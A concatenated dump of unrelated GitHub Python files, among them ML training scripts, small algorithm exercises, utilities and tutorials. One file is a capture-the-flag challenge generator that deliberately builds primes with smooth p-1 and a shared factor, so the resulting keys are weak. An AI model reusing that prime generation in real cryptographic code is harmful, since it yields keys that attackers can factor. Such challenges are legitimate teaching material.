input 2D array to be normalized.\n name (str): The name indicating the type of data in the array, used to determine the normalization method.\n\n Returns:\n numpy.ndarray: The normalized 2D array.\n\n \"\"\"\n\n # If the chunk has no positive values, return it as is\n if not chunk[chunk > 0].any():\n return chunk\n\n # For certain types of data, divide by the maximum value to scale to [0, 1]\n if name in ['heatmap', 'distance', 'speed', 'acceleration', 'bearing_deviation', 'bearing_difference']:\n chunk = chunk / np.max(chunk)\n\n # For other types of data, subtract the minimum value and divide by the range to scale and shift to [0, 1]\n elif name in ['altitude', 'slope']:\n min_val = np.min(chunk[chunk > 0]) # compute the minimum excluding zeros\n chunk = (chunk - min_val) / (np.max(chunk) - min_val + np.finfo(float).eps)\n\n return chunk\n\ndef augmentDatasetWithRotation(folderPath):\n \"\"\"\n This function performs data augmentation by rotating each image in the dataset by multiples of 90 degrees, then cropping it back to its original size.\n The augmented images are saved in new directories, following the original directory structure.\n\n Args:\n folderPath (str): The path of the directory containing the dataset to augment.\n \"\"\"\n\n # Get the paths to the example directories\n example_paths = glob(folderPath + '/*/*')\n\n # Loop over each example directory\n for ep in example_paths:\n\n # Get the paths to the channel images in the current example directory\n channel_image_paths = glob(ep + '/*')\n\n # Loop over each channel image\n for cip in channel_image_paths:\n # Load the current channel image\n ci = Image.open(cip)\n\n # Save the original image size\n original_size = (np.array(ci).shape[0], np.array(ci).shape[0]) # Original input size\n\n # Generate rotated versions of the image\n for i in range(1, 4): # Create 3 rotations\n # Calculate the rotation angle (90 degrees multiplied by the rotation index)\n rotation_angle = i * 90 \n\n # Define the output directory and ensure it exists\n dirpath = os.path.dirname(cip) + '_' + str(rotation_angle)\n filepath = os.path.basename(cip)\n if channel_image_paths.index(cip) == 0: os.mkdir(dirpath)\n\n # Rotate the image\n ci_rotated = ci.rotate(-rotation_angle, resample=Image.BICUBIC, expand=True)\n\n # Crop the image back to the original size\n width, height = ci_rotated.size\n left = (width - original_size[0]) / 2\n top = (height - original_size[1]) / 2\n right = (width + original_size[0]) / 2\n bottom = (height + original_size[1]) / 2\n ci_rotated_cropped = ci_rotated.crop((left, top, right, bottom))\n\n # Save the cropped, rotated image\n ci_rotated_cropped.save(os.path.join(dirpath, filepath))\n\ndef permuteImageChannel(image):\n \"\"\"\n This function permutes the values of an input image randomly and returns the permuted image.\n\n Args:\n image (numpy.ndarray): The input 2D array representing the image.\n\n Returns:\n numpy.ndarray: The permuted image.\n \"\"\"\n\n # Create a copy of the input image\n permuted_image = image.copy()\n\n # Randomly permute the pixels of the image\n permuted_image[:, :] = np.random.permutation(permuted_image[:, :].ravel()).reshape(image.shape[0], image.shape[1])\n \n return permuted_image\n","repo_name":"olivierschirm/code-article2","sub_path":"imageTiling.py","file_name":"imageTiling.py","file_ext":"py","file_size_in_byte":15891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11321555681","text":"from data.ptb import PTB\n\nimport torch\nfrom loss import VAE_Loss\nfrom model import LSTM_VAE\nfrom train import Trainer\n\nfrom settings import global_setting, model_setting, training_setting\n\nfrom utils import interpolate, plot_elbo, get_latent_codes, visualize_latent_codes\n\nimport argparse\n\n# General Settings\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\ntorch.manual_seed(global_setting[\"seed\"])\n\n\nparser = argparse.ArgumentParser(description=\" A parser for baseline uniform noisy experiment\")\nparser.add_argument(\"--batch_size\", type=str, default=\"32\")\nparser.add_argument(\"--bptt\", type=str,default=\"60\")\nparser.add_argument(\"--embed_size\", type=str, default=\"300\") \nparser.add_argument(\"--hidden_size\", type=str, default=\"256\")\nparser.add_argument(\"--latent_size\", type=str, default=\"16\")\nparser.add_argument(\"--lr\", type=str, default=\"0.001\")\n\n\n# Extract commandline arguments \nargs = parser.parse_args()\n\nbatch_size = int(args.batch_size) if args.batch_size!=None else training_setting[\"batch_size\"]\nbptt = int(args.bptt) if args.bptt!=None else training_setting[\"bptt\"]\nembed_size = int(args.embed_size) if args.embed_size!=None else training_setting[\"embed_size\"]\nhidden_size = int(args.hidden_size) if args.hidden_size!=None else training_setting[\"hidden_size\"]\nlatent_size = int(args.latent_size) if args.latent_size!=None else training_setting[\"latent_size\"]\nlr = float(args.lr) if args.lr!=None else training_setting[\"lr\"]\n\n\n\n# Load the data\ntrain_data = PTB(data_dir=\"./data\", split=\"train\", create_data= False, max_sequence_length= bptt)\ntest_data = PTB(data_dir=\"./data\", split=\"test\", create_data= False, max_sequence_length=bptt)\nvalid_data = PTB(data_dir=\"./data\", split=\"valid\", create_data= False, max_sequence_length= bptt)\n\n# Batchify the data\ntrain_loader = torch.utils.data.DataLoader( dataset= train_data, batch_size=batch_size, shuffle= True)\ntest_loader = torch.utils.data.DataLoader( dataset= test_data, batch_size= batch_size, shuffle= True)\nvalid_loader = torch.utils.data.DataLoader( dataset= valid_data, batch_size= batch_size, shuffle= True)\n\n\n\nvocab_size = train_data.vocab_size\nmodel = LSTM_VAE(vocab_size = vocab_size, embed_size = embed_size, hidden_size = hidden_size, latent_size = latent_size).to(device)\n\nLoss = VAE_Loss()\noptimizer = torch.optim.Adam(model.parameters(), lr= training_setting[\"lr\"])\n\ntrainer = Trainer(train_loader, test_loader, model, Loss, optimizer)\n\n\n\n\nif __name__ == \"__main__\":\n\n # Epochs\n train_losses = []\n test_losses = []\n for epoch in range(training_setting[\"epochs\"]):\n print(\"Epoch: \", epoch)\n print(\"Training.......\")\n train_losses = trainer.train(train_losses, epoch, training_setting[\"batch_size\"], training_setting[\"clip\"])\n print(\"Testing.......\")\n test_losses = trainer.test(test_losses, epoch, training_setting[\"batch_size\"])\n\n\n plot_elbo(train_losses, \"train\")\n plot_elbo(test_losses, \"test\")\n\n\n\n\n","repo_name":"Khamies/LSTM-Variational-AutoEncoder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"26775759058","text":"import os\nimport yaml\n\n\ndef parse_config_file():\n \"\"\"\n Find the .splunk_logger config file in the current directory, or in the\n user's home and parse it. The one in the current directory has precedence.\n \n :return: A tuple with:\n - project_id\n - access_token\n \"\"\"\n for filename in ('.splunk_logger', os.path.expanduser('~/.splunk_logger')):\n\n project_id, access_token, api_domain = _parse_config_file_impl(filename)\n\n if project_id is not None\\\n and access_token is not None\\\n and api_domain is not None:\n return project_id, access_token, api_domain\n\n else:\n return None, None, None\n\n\ndef _parse_config_file_impl(filename):\n \"\"\"\n Format for the file is:\n \n credentials:\n project_id: ...\n access_token: ...\n api_domain: ...\n \n :param filename: The filename to parse\n :return: A tuple with:\n - project_id\n - access_token\n - api_domain\n \"\"\"\n try:\n doc = yaml.load(file(filename).read())\n \n project_id = doc[\"credentials\"][\"project_id\"]\n access_token = doc[\"credentials\"][\"access_token\"]\n api_domain = doc[\"credentials\"][\"api_domain\"]\n \n return project_id, access_token, api_domain\n except:\n return None, None, None\n\n\ndef get_config_from_env():\n return (os.environ.get('SPLUNK_PROJECT_ID', None),\n os.environ.get('SPLUNK_ACCESS_TOKEN', None),\n os.environ.get('SPLUNK_API_DOMAIN', None))","repo_name":"andresriancho/splunk-logger","sub_path":"splunk_logger/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"32675905413","text":"from Crypto.Util.number import isPrime\nimport random\nfrom math import prod\nNBITS = 512\n\nrandom.seed(\"848c895e7a650b6d51ecff9976ce5d7e\")\n\ndef gen_prime(ubound):\n while True:\n p = random.randrange((ubound - 1)//2) * 2 + 1\n if isPrime(p):\n return p\n\ndef gen_full(shared):\n while True:\n p = 2 * shared\n while p.bit_length() < NBITS:\n p *= gen_prime(shared)**random.randrange(1, 6)\n p += 1\n\n if isPrime(p):\n return p\n\nwhile True:\n shared = random.randrange(2**18, 2**19) * 2 + 1\n if isPrime(shared):\n break\n\np = gen_full(shared)\nq = gen_full(shared)\nassert p != q\n","repo_name":"ImaginaryCTF/ImaginaryCTF-2022-Challenges","sub_path":"Crypto/smoll/secret.py","file_name":"secret.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"69811878969","text":"import json\nimport os\nfrom xml.etree import ElementTree\n\nimport requests\n\nwith open(os.path.expanduser(\"~/Desktop/code/api_keys/goodreads_api_key.json\")) as f:\n api_key = json.loads(f.read())\n\nshelves_url = \"https://www.goodreads.com/shelf/list.xml\"\nreviews_url = \"https://www.goodreads.com/review/list?v=2\"\nuser_id = \"119459640\"\nshelves_params = {\"key\": api_key[\"key\"], \"user_id\": user_id}\nreviews_params = {\"shelf\": \"read\", \"key\": api_key[\"key\"]}\n\n# get my shelves\nshelves_response = requests.get(shelves_url, params=shelves_params)\nshelves_tree = ElementTree.fromstring(shelves_response.content)\n\nfor shelf in shelves_tree.find(\"shelves\").findall(\"user_shelf\"):\n name = shelf.find(\"name\").text\n book_count = shelf.find(\"book_count\").text\n print(name, book_count)\n\n \nprint()\n","repo_name":"ayyjohn/book_info","sub_path":"to_read_list.py","file_name":"to_read_list.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16678429677","text":"import matplotlib.pyplot as plt\r\ndef pascalharomszog(n):\r\n if n==0:\r\n return [1]\r\n else:\r\n X = pascalharomszog(n-1)\r\n return [1] + [X[i] +X[i+1] for i in range(n-1)] + [1]\r\ndef kiir(n):\r\n for i in range(n+1):\r\n print(pascalharomszog(i))\r\n\r\n\r\nn1,n2=(input('ket szamot vesszovel elvalasztva, n1 legyen nagyobb mint n2')).split(',')\r\nn1,n2=int(n1),int(n2)\r\nwhile n1 8:\n byte = secret_msg[i*interval: (i+1)*interval].astype(int)\n byte_value = int(''.join(byte.astype(str)))\n if byte_value == 0:\n break\n output += [byte_value]\n i += 1\n\n return output\n\ndef setFlag(stego, brokenPixelIndexList, pixelIndexList):\n new_image = hsiToRGB(stego, stego.shape)\n for index in brokenPixelIndexList:\n new_image[:,:,0][index[0]][index[1]] = new_image[:,:,0][index[0]][index[1]].astype(int) & 254\n for index in pixelIndexList:\n new_image[:,:,0][index[0]][index[1]] = new_image[:,:,0][index[0]][index[1]].astype(int) | 1\n\n return new_image","repo_name":"nguyen1212/steganography_backend","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15270900634","text":"#! /usr/local/bin/python3\nwith open('input.txt', 'r') as input:\n data = sorted(input.read().strip().split('\\n'))\n\n current_guard: None\n sleeps = {}\n\n for i, line in enumerate(data):\n timestamp, instruction = line.split(\"] \")\n if instruction.startswith(\"Guard #\"):\n current_guard = instruction.lstrip(\"Guard #\").rstrip(\" begins shift\")\n if current_guard not in sleeps:\n sleeps[current_guard] = {}\n else:\n # it's not a guard so this is a sleep/wake situation\n if instruction.startswith(\"falls asleep\"):\n start_min = int(timestamp.split(\" \")[1].split(\":\")[1])\n end_min = int(data[i+1].split(\"] \")[0].split(\" \")[1].split(\":\")[1]) # this assumes the line after \"falls asleep\" is always \"wakes up\". true?\n for x in range(start_min, end_min):\n if x in sleeps[current_guard]:\n sleeps[current_guard][x] += 1\n else:\n sleeps[current_guard][x] = 1\n \n # now get the total minutes each guard was sleeping\n guard_totals = {}\n for k, v in sleeps.items():\n guard_totals[k] = sum(v.values())\n\n sleepy_guard = max(guard_totals.items(), key=lambda k: k[1])[0] # ('10', 50)\n sleep_minutes = max(sleeps[sleepy_guard].items(), key=lambda k: k[1])[0]\n print(\"guard\", sleepy_guard, \"sleeps\", sleep_minutes, \"total\", int(sleepy_guard) * int(sleep_minutes))\n\n # part 2\n guard = ''\n minute = 0\n max_sleeps = 0\n for k, v in sleeps.items():\n if len(v.items()) > 0:\n current_max = max(v.items(), key=lambda k: k[1])[1]\n if current_max > max_sleeps:\n max_sleeps = current_max\n guard = k\n minute = max(v.items(), key=lambda k: k[1])[0]\n \n print(guard, minute, int(guard) * int(minute))","repo_name":"ruhee/advent-of-code-2018","sub_path":"04/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33364295242","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\n\nclass Dataset:\n def __init__(self, dataset_path = 'dataset/'):\n self.dataset_path = dataset_path\n\n def _load_from_file(self, name):\n with open(name, 'rb') as file:\n data = pickle.load(file, encoding = 'bytes')\n return data\n\n def _get_data_from_dict(self, name):\n return np.array(name[b'data'] / 255)\n\n def _get_labels_from_dict(self, name):\n return np.array(name[b'labels'])\n\n def get_arrays_from_training_dataset(self):\n data_array = []\n labels_array = []\n\n for i in range(1,6):\n dataset = self._load_from_file('%s/data_batch_%s' % (self.dataset_path, i))\n data = self._get_data_from_dict(dataset)\n labels = self._get_labels_from_dict(dataset)\n data_array.append(data)\n labels_array.append(labels)\n\n data_array = np.concatenate(data_array)\n labels_array = np.concatenate(labels_array)\n\n return data_array, labels_array\n\n def get_arrays_from_test_dataset(self):\n dataset = self._load_from_file('%s/test_batch' % self.dataset_path)\n data_array = self._get_data_from_dict(dataset)\n labels_array = self._get_labels_from_dict(dataset)\n\n return data_array, labels_array\n\n def split_dataset_into_train_valid(self, dataset, training_percent):\n split_number = int(training_percent / 100 * 50000)\n training_dataset = dataset[:split_number]\n validation_dataset = dataset[split_number:]\n\n return training_dataset, validation_dataset\n\n def get_labels_names(self):\n return np.array(['airplane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'])\n\n def show_sample_images(self, rows_number, columns_number):\n labels_names = self.get_labels_names()\n data, labels = self.get_arrays_from_training_dataset()\n\n figure, axes = plt.subplots(rows_number, columns_number, figsize=(columns_number, rows_number))\n axes = axes.flatten()\n\n for i in range(rows_number*columns_number):\n image = data[i].reshape([3, 32, 32])\n image = image.transpose([1, 2, 0])\n label_name = labels_names[labels[i]]\n axes[i].imshow(image)\n axes[i].set_title(label_name)\n axes[i].set_yticks([])\n axes[i].set_xticks([])\n\n figure.canvas.set_window_title('Sample images')\n plt.tight_layout()\n plt.show()\n","repo_name":"Piotr1312/ImageClassifier","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"16928360276","text":"import cancer_data\nfrom vec import Vec\nimport vec\nfrom mat import Mat\nimport mat\nimport random\nfrom mat import transpose\n\n\ndef signum(u):\n for n2 in u.D:\n if u[n2] < 0:\n u[n2] = -1\n else:\n u[n2] = 1\n return u\n\n\ndef fraction_wrong(A, b, w):\n length = len(b.D)\n num = b * signum(A*w)\n return ((length-num)/2)/length\n\n\ndef loss(A, b, w):\n return (A*w - b) * (A*w - b)\n\n\ndef find_grad(A, b, w):\n # grad = Vec(A.D[1], {})\n # for n1 in A.D[0]:\n # temp = Vec(A.D[1], {})\n # for n2 in A.D[1]:\n # temp[n2] = A[(n1, n2)]\n # grad = grad + 2 * (temp * w - b[n1]) * temp\n # return grad\n return 2 * (transpose(A) * ((A * w) - b))\n\n\ndef gradient_decent_step(A, b, w, sigma):\n return w - (sigma * find_grad(A, b, w))\n\n\ndef gradient_decent(A, b, w, sigma, T):\n for i2 in range(T):\n if i2 % 30 == 0:\n print(\"Loss: \" + str(loss(A, b, w)))\n print(\"Fraction Wrong: \" + str(fraction_wrong(A, b, w)))\n w = gradient_decent_step(A, b, w, sigma)\n return w\n\n\ndata = cancer_data.read_training_data('train.data')\nA2 = data[0]\nb2 = data[1]\n\nw2 = Vec(A2.D[1], {})\n\nfor n in A2.D[1]:\n w2[n] = 0\n\n#print(gradient_decent(A2, b2, w2, .000000002, 1000))\n\nfor i in range(800):\n if i % 30 == 0:\n print(\"Loss: \" + str(loss(A2, b2, w2)))\n print(\"Fraction Wrong: \" + str(fraction_wrong(A2, b2, w2)))\n #print(w2)\n w2 = gradient_decent_step(A2, b2, w2, .000000001)\n #print(gradient_decent_step(A2, b2, w2, .000000002))\n #print(\"Fraction Wrong: \" + str(fraction_wrong(A2, b2, w2)))\n #print(w3)\n #w2 = w3\n #print(w3)\n\nprint(w2)\n\nnew_data = cancer_data.read_training_data('validate.data')\nA_new = new_data[0]\nb_new = new_data[1]\n\nprint(fraction_wrong(A_new, b_new, w2))\n","repo_name":"stryker51a/Cancer-Machine-Learning","sub_path":"Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30984616448","text":"import queue\r\nfrom itertools import count\r\n\r\n# Used to add unique second key in queue\r\n# So priority is first compared, then the counter\r\nunique = count()\r\n \r\nclass Dijkstra:\r\n # Create the dijkstra with a given number of cell\r\n def __init__(self, k):\r\n self.nb_cell = k\r\n\r\n \r\n \r\n # Update the top node of the dijkstra, with the best known node\r\n def _update_top(self):\r\n top = self.neighborQueue.get()\r\n self.top_cost = top[0]\r\n self.top_data = top[2]\r\n \r\n \r\n \r\n # Init the queue with the first neighbors\r\n def _first_step(self, start, neighbors_function, cost_function):\r\n for move, neighbor in neighbors_function(start): \r\n cost = cost_function(move, neighbor)\r\n #{prochaine position , orientation , [le chmemin] , }\r\n data = {'node': neighbor, 'move_list': [move], 'node_list': [neighbor]}\r\n \r\n self.neighborQueue.put((cost, next(unique), data))\r\n \r\n \r\n \r\n # Add all neighbor of a node\r\n def _add_neighbors(self, node, neighbors_function, cost_function):\r\n for move, neighbor in neighbors_function(node): \r\n cost = self.top_cost + cost_function(move, neighbor)\r\n data = {'node': neighbor, 'move_list': self.top_data['move_list'] + [move], 'node_list': self.top_data['node_list'] + [neighbor]}\r\n \r\n self.neighborQueue.put((cost, next(unique), data))\r\n \r\n \r\n \r\n # Main function of the class\r\n # The start is the start of the path\r\n # The neighbors_function takes a node, and return a list of (move, neighbor)\r\n # The cost_function takes a move and a node, and return the cost of taking this node\r\n # The end_function takes a cost and a node, and return true is the end condition is triggered\r\n def find(self, start, neighbors_function, cost_function, end_function):\r\n # Init the queue and explored array\r\n self.neighborQueue = queue.PriorityQueue()\r\n self.explored = [False]*self.nb_cell*self.nb_cell\r\n self.explored[start] = True\r\n \r\n # Add first nodes\r\n self._first_step(start, neighbors_function, cost_function)\r\n \r\n # If no move possible return None, None\r\n if self.neighborQueue.empty():\r\n return None, None\r\n \r\n # Update the top node\r\n self._update_top()\r\n \r\n # While we can try new node and not finished, we iterate\r\n while not self.neighborQueue.empty() and not end_function(self.top_cost, self.top_data):\r\n node = self.top_data['node']\r\n \r\n # If the top node is not explored, explore it\r\n if not self.explored[node]:\r\n self.explored[node] = True\r\n self._add_neighbors(node, neighbors_function, cost_function)\r\n \r\n # Update the top node\r\n self._update_top()\r\n \r\n return self.top_cost, self.top_data\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TheoriginalMMM/Multi-Agnts-Taquin","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30908774539","text":"# def greeting(name):\n# print(f'Hi {name}!')\n\n# greeting()\n# greeting('Kristine')\n\n# Traceback (most recent call last):\n# File \"Function_Default_Args.py\", line 4, in \n# greeting()\n# TypeError: greeting() missing 1 required positional argument: 'name'\n\n# -------------------------------------\n\n# def greeting(name = 'Guest'):\n# print(f'Hi {name}!')\n\n# greeting()\n# greeting('Kristine')\n\n# Hi Guest!\n# Hi Kristine!\n\n# -------------------------------------\n\ndef some_function(collection = []): # NEVER set default argument as a list!!!!\n collection.append(1)\n print(id(collection)) # Prints where in memory this is saved\n return collection\n\nprint(some_function())\n\n# 2650556862784\n# [1]\n\n# Other part of progream\nprint(some_function()) \n\n2650556862784\n[1, 1]\n# each additional time called w/in program it \n# will add to previous appended number\n# BAD PRACTICE!\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MReneBrown/Python-Course","sub_path":"Function_Default_Args.py","file_name":"Function_Default_Args.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39730809819","text":"class Letter:\r\n def __init__(self, pattern=None):\r\n self.pattern = pattern\r\n \r\n def __iter__(self):\r\n yield from self.pattern\r\n \r\n def __str__(self):\r\n output = []\r\n for blip in self:\r\n if blip == '.':\r\n output.append('dot')\r\n else:\r\n output.append('dash')\r\n return '-'.join(output)\r\n @classmethod\r\n def from_string(cls, something):\r\n cool_string = something.split('-')\r\n nice_string = []\r\n for x in cool_string:\r\n if x == 'dash':\r\n nice_string.append('_')\r\n else:\r\n nice_string.append('.')\r\n cls.pattern = nice_string\r\n return cls(pattern = nice_string)\r\n \r\n\r\nclass S(Letter):\r\n def __init__(self):\r\n pattern = ['.', '.', '.']\r\n super().__init__(pattern)\r\n \r\nanswer = Letter.from_string('dot-dot-dash-dot-dash')\r\nprint(answer.pattern)","repo_name":"MichaelPay/michael_learns_python","sub_path":"Python Projects/OOP Python/classmethod challenge.py","file_name":"classmethod challenge.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30083194707","text":"\"\"\"\nБилеты в кино:\nкинотеатр установил несколько вариантов цены на билет в зависимости от возраста посетителя.\nДля посетителей младше 3 лет билет бесплатный;\nв возрасте от 3 до 12 билет состоит 10 долларов;\nнаконец, если возраст посетителя больше 12 лет, билет стоит 15 долларов.\nНапишите цикл, который предлагает пользователю ввести возраст и выводит цену билета.\n\"\"\"\nprompt = f\"Пожалуйста введите сколько вам лет: \"\nprompt += f\"\\nдля выхода введите 'выход': \"\n\naction = True\nwhile action:\n age = input(\"Пожалуйста введите сколько вам лет: \")\n if age == \"quit\":\n break\n elif age == \"выход\": # Проверка на вводе слова \"выход\"\n action = False\n else:\n age = int(age)\n if age < 3:\n print(f\"Так как вам {age} билет вы получаетет бесплатно.\")\n elif age >= 3 and age < 12:\n print(f\"Так как вам {age} билет стоит 10$.\")\n elif age >= 12:\n print(f\"Так как вам {age} билет стоит 15$.\")\n","repo_name":"MaximZolotukhin/erik_metiz","sub_path":"chapter_7/exercise_7.5.py","file_name":"exercise_7.5.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37901771212","text":"#!/usr/bin/python\n\nimport sys\nimport socket\nimport requests\n\nif len(sys.argv) == 1:\n print(\"Please specify an IP address, or 'me' to look up your own current IP.\\nUsage: ipgeo \")\n sys.exit()\nelse:\n ip = sys.argv[1]\n\n# --- get your own IP address ---\nif not ip or ip in [ 'self', 'mine', 'me', 'my', 'own', 'local', 'current']:\n r = requests.get('https://curlmyip.org')\n ip = r.text\n\n# --- validate IP address ---\ntry:\n socket.inet_aton(ip)\nexcept:\n print(f\"Invalid IP address: {ip}\")\n sys.exit()\n\n# --- get the info ---\nresponse = requests.get('http://ip-api.com/json/%s' % ip).json()\n\nif response['status'] == 'fail':\n print(\"Lookup of IP \\\"%s\\\" failed!\\nFail message from API: %s\" % (ip, response['message']))\n sys.exit()\n\nprint(\"IP: %s\\nCity: %s\\nRegion: %s\\nCountry: %s\" % (ip, response['city'], response['region'], response['country']))","repo_name":"Whelk/ipgeo","sub_path":"ipgeo.py","file_name":"ipgeo.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11667855522","text":"from ray import tune\n\nfrom toolbox.dice.dice import DiCETrainer\nfrom toolbox.marl import get_marl_env_config\nfrom toolbox.train import train, get_train_parser\n\nif __name__ == '__main__':\n parser = get_train_parser()\n parser.add_argument(\"--num-agents\", type=int, default=10)\n args = parser.parse_args()\n\n env_name = args.env_name\n exp_name = \"{}-{}\".format(args.exp_name, env_name)\n stop = int(5e7)\n\n config = {\n \"num_sgd_iter\": 10,\n \"num_envs_per_worker\": 1,\n \"entropy_coeff\": 0.001,\n \"lambda\": 0.95,\n \"lr\": 2.5e-4,\n\n # 'sample_batch_size': 200 if large else 50,\n # 'sgd_minibatch_size': 100 if large else 64,\n # 'train_batch_size': 10000 if large else 2048,\n \"num_gpus\": 1,\n \"num_cpus_per_worker\": 1,\n \"num_cpus_for_driver\": 2,\n 'num_workers': 16\n }\n\n config.update(\n get_marl_env_config(env_name, tune.grid_search([args.num_agents]))\n )\n\n train(\n DiCETrainer,\n config=config,\n stop=stop,\n exp_name=exp_name,\n num_seeds=args.num_seeds,\n num_gpus=args.num_gpus,\n test_mode=args.test,\n )\n","repo_name":"pengzhenghao/rl-interpretation","sub_path":"scripts/atv/atv_train_dice.py","file_name":"atv_train_dice.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36304820320","text":"import os\nimport os.path\nfrom PIL import Image\n\n\ndef convert(manga, mangaPath):\n removedFiles = []\n count = [0, 0]\n print('converting ' + manga)\n for volume in os.listdir(mangaPath):\n print('├── ' + volume)\n for chapter in os.listdir(mangaPath + '/' + volume):\n print('│ ├── ' + chapter)\n for file in os.listdir(mangaPath + '/' + volume + '/' + chapter):\n if file[-3:] != 'jpg':\n source = mangaPath + '/' + volume + '/' + chapter + '/' + file\n try:\n image = Image.open(source)\n rgbImage = image.convert('RGB')\n rgbImage.save(source[:-3] + 'jpg')\n os.remove(source)\n print('│ │ ├── converted: ' + file[:-4])\n count[0] += 1\n count[1] += 1\n except:\n print('│ │ ├── can\\'t convert ' + file)\n elif file[-3:] == 'jpg':\n print('│ │ ├── ' + file[:-4] + ' is .jpg')\n count[0] += 1\n print('# of removed files: ' + str(len(removedFiles)) if str(len(removedFiles)) != '' else '0')\n print('removed files: ' + ', '.join(removedFiles) if str(len(removedFiles)) != '' else 'None')\n print('total images: ' + str(count[0]))\n print('non jpg images: ' + str(count[1]))\n print('finished renaming ' + manga)\n","repo_name":"jetpham/MangaFormating","sub_path":"Format/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31304707618","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy import signals\nfrom scrapy.exporters import CsvItemExporter\nimport csv\n\n\nclass CrawlerPipeline(object):\n\n @classmethod\n def from_crawler(cls, crawler):\n pipeline = cls()\n crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)\n crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)\n return pipeline\n\n def spider_opened(self, spider):\n self.file = open(r\"/Users/weirdguy/PycharmProjects/CrawlEnviron/__crawler/__crawler/spiders/data/%s.csv\" % (spider.name), 'wb')\n self.exporter = CsvItemExporter(self.file)\n self.exporter.start_exporting()\n\n def spider_closed(self, spider):\n self.exporter.finish_exporting()\n self.file.close()\n\n # given I am using Windows, I need to eliminate the blank lines in the csv file\n print(\"Starting csv blank line cleaning\")\n with open('/Users/weirdguy/PycharmProjects/CrawlEnviron/__crawler/__crawler/spiders/data/%s.csv' % spider.name,\n 'r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n original_list = list(reader)\n cleaned_list = list(filter(None, original_list))\n\n with open('/Users/weirdguy/PycharmProjects/CrawlEnviron/__crawler/__crawler/spiders/data/%s_cleaned.csv' % spider.name,\n 'w', newline='', encoding=\"utf-8\") as output_file:\n wr = csv.writer(output_file, dialect='excel')\n for data in cleaned_list:\n wr.writerow(data)\n\n def process_item(self, item, spider):\n self.exporter.export_item(item)\n return item","repo_name":"theweirdguy/ScotiaScrape","sub_path":"__crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11753335482","text":"# Operaciones aritméticas\n\"\"\"\nEscribe un programa que pida dos números y que devuelva su suma, resta, producto y división.\n\nRestricciones:\nConvertir las cadenas de entrada en números.\nSeparar convenientemente la entrada, transformación de cadena en números y salida separados.\nCrea una única sentencia de salida con los saltos de línea adecuados (sólo un print).\n\nRetos:\nControla que las entradas sean números de forma que el programa no avance si no se introduce un número.\nNo permitas introducir números negativos.\n\"\"\"\n\nwhile True:\n strnum1 = input(\"Ingresa primer número: \")\n try:\n num1 = float(strnum1)\n except:\n print(\"Error. Debes introducir un número.\")\n continue\n if num1 < 0:\n print(\"Debes introducir un número positivo.\")\n continue\n break\n\nwhile True:\n strnum2 = input(\"Ingresa segundo número: \")\n try:\n num2 = float(strnum2)\n except:\n print(\"Error. Debes introducir un número.\")\n continue\n\n if num2 < 0:\n print(\"Debes introducir un número positivo.\")\n continue\n break\n\nprint(\"{} + {} = {}\\n{} - {} = {}\\n{} * {} = {}\\n{} / {} = {}\\n \".format(num1, num2, num1+num2, num1, num2, num1-num2, num1, num2, num1*num2, num1, num2, num1/num2))\n","repo_name":"sigutier/Introduction_to_programming","sub_path":"00 - Pensamiento 